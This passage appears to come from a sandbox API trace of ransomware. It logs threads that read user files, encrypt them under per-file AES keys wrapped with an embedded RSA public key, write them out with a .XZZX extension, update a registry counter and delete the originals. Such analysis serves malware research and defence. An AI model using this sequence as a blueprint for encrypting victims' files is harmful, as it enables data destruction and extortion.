param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\zKa6.xls") returned 63 [0170.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0170.889] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\074B93892CEB8207FA07ADC92F86664F.XZZX") returned 92 [0170.889] StrStrW (lpFirst="zKa6.xls", lpSrch="XZZX") returned 0x0 [0170.889] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\zKa6.xls", dwFileAttributes=0x20) returned 1 [0170.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\zKa6.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\zka6.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9fc [0170.890] ReadFile (in: hFile=0x9fc, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x12746, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x12746, lpOverlapped=0x0) returned 1 [0170.891] CloseHandle (hObject=0x9fc) returned 1 [0170.891] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0170.891] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0170.891] SetErrorMode (uMode=0x1) returned 0x1 [0170.891] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0170.891] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5e00) returned 1 [0170.893] CryptGenKey (in: hProv=0x43a5e00, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde9d8) returned 1 [0171.079] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.079] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0171.079] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.080] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0171.080] CryptDestroyKey (hKey=0x3cde9d8) returned 1 [0171.080] CryptReleaseContext (hProv=0x43a5e00, dwFlags=0x0) returned 1 [0171.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\074B93892CEB8207FA07ADC92F86664F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\074b93892ceb8207fa07adc92f86664f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0c [0171.082] WriteFile (in: hFile=0xa0c, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x12746, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x12746, lpOverlapped=0x0) returned 1 [0171.083] SetFilePointer (in: hFile=0xa0c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12746 [0171.083] WriteFile (in: hFile=0xa0c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.083] SetFilePointer (in: hFile=0xa0c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1274b [0171.083] WriteFile (in: hFile=0xa0c, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x10, lpOverlapped=0x0) returned 1 [0171.083] SetFilePointer (in: hFile=0xa0c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1275b [0171.083] WriteFile (in: hFile=0xa0c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.083] SetFilePointer (in: hFile=0xa0c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12760 [0171.083] SetErrorMode (uMode=0x1) returned 0x1 [0171.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0171.083] OutputDebugStringW (lpOutputString="end") [0171.083] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.083] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0171.083] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5e00) returned 1 [0171.084] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5e00, dwCertEncodingType=0x1, pInfo=0x43a3000*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a3030*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a3038*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3cdea58) returned 1 [0171.084] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.084] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0171.084] CryptEncrypt (in: hKey=0x3cdea58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0171.084] CryptEncrypt (in: hKey=0x3cdea58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5e88*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5e88*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0171.084] WriteFile (in: hFile=0xa0c, lpBuffer=0x43a5e88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5e88*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0171.085] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0171.085] WriteFile (in: hFile=0xa0c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0171.085] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0171.085] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0171.085] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0xa10) returned 0x0 [0171.085] RegQueryValueExW (in: hKey=0xa10, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x106, lpcbData=0x29adfdc*=0x4) returned 0x0 [0171.085] RegCloseKey (hKey=0xa10) returned 0x0 [0171.085] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0xa10) returned 0x0 [0171.085] RegSetValueExW (in: hKey=0xa10, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x107, cbData=0x4 | out: lpData=0x29adfec*=0x107) returned 0x0 [0171.085] RegCloseKey (hKey=0xa10) returned 0x0 [0171.085] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.085] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.086] CloseHandle (hObject=0xa0c) returned 1 [0171.086] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0171.086] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0171.086] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\zKa6.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\zka6.xls")) returned 1 [0171.087] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\zKa6.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\zka6.xls")) returned 0 Thread: id = 588 os_tid = 0x6e8 [0171.081] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.081] lstrcpyW (in: lpString1=0x2aaf460, lpString2="6IAM.m4a" | out: lpString1="6IAM.m4a") returned="6IAM.m4a" [0171.081] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0171.081] SetErrorMode (uMode=0x1) returned 0x1 [0171.081] lstrcpyW (in: lpString1=0x2aaf860, lpString2="6IAM.m4a" | out: lpString1="6IAM.m4a") returned="6IAM.m4a" [0171.081] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xfc789629, Data2=0x9e7c, Data3=0x44fa, Data4=([0]=0x8e, [1]=0xef, [2]=0xe6, [3]=0xf8, [4]=0xef, [5]=0xa9, [6]=0x44, [7]=0x98))) returned 0x0 [0171.081] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\6IAM.m4a") returned 74 [0171.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0171.081] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\B71609DC2AB3B518FC7896292D5E9960.XZZX") returned 103 [0171.081] StrStrW (lpFirst="6IAM.m4a", lpSrch="XZZX") returned 0x0 [0171.081] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\6IAM.m4a", dwFileAttributes=0x20) returned 1 [0171.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\6IAM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\6iam.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9f4 [0171.088] ReadFile (in: hFile=0x9f4, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xf832, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x2aae418*=0xf832, lpOverlapped=0x0) returned 1 [0171.089] CloseHandle (hObject=0x9f4) returned 1 [0171.089] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0171.089] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0171.089] SetErrorMode (uMode=0x1) returned 0x1 [0171.089] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0171.089] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5f10) returned 1 [0171.091] CryptGenKey (in: hProv=0x43a5f10, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde9d8) returned 1 [0171.232] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0171.232] CryptExportKey (in: hKey=0x3cde9d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x2aae41c | out: pbData=0x1c70000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0171.232] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.233] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0171.233] CryptDestroyKey (hKey=0x3cde9d8) returned 1 [0171.233] CryptReleaseContext (hProv=0x43a5f10, dwFlags=0x0) returned 1 [0171.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\B71609DC2AB3B518FC7896292D5E9960.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\b71609dc2ab3b518fc7896292d5e9960.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa10 [0171.233] WriteFile (in: hFile=0xa10, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xf832, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x2aae438*=0xf832, lpOverlapped=0x0) returned 1 [0171.235] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf832 [0171.235] WriteFile (in: hFile=0xa10, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0171.235] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf837 [0171.235] WriteFile (in: hFile=0xa10, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x10, lpOverlapped=0x0) returned 1 [0171.235] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf847 [0171.235] WriteFile (in: hFile=0xa10, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0171.235] SetFilePointer (in: hFile=0xa10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf84c [0171.235] SetErrorMode (uMode=0x1) returned 0x1 [0171.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0171.235] OutputDebugStringW (lpOutputString="end") [0171.236] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0171.236] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0171.236] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x43a5f10) returned 1 [0171.236] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5f10, dwCertEncodingType=0x1, pInfo=0x43a30d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a3100*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a3108*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x3cdead8) returned 1 [0171.236] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0171.237] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0171.237] CryptEncrypt (in: hKey=0x3cdead8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0171.237] CryptEncrypt (in: hKey=0x3cdead8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5f98*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5f98*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0171.237] WriteFile (in: hFile=0xa10, lpBuffer=0x43a5f98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5f98*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0171.237] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0171.237] WriteFile (in: hFile=0xa10, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0171.237] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0171.237] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0171.237] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0xa14) returned 0x0 [0171.238] RegQueryValueExW (in: hKey=0xa14, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0x107, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0171.238] RegCloseKey (hKey=0xa14) returned 0x0 [0171.238] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0xa14) returned 0x0 [0171.238] RegSetValueExW (in: hKey=0xa14, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0x108, cbData=0x4 | out: lpData=0x2aadfec*=0x108) returned 0x0 [0171.238] RegCloseKey (hKey=0xa14) returned 0x0 [0171.238] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.238] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.238] CloseHandle (hObject=0xa10) returned 1 [0171.239] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0171.239] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0171.239] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\6IAM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\6iam.m4a")) returned 1 [0171.240] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\6IAM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\3yo4kg3p-k\\6iam.m4a")) returned 0 Thread: id = 589 os_tid = 0x74c [0171.241] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0171.241] 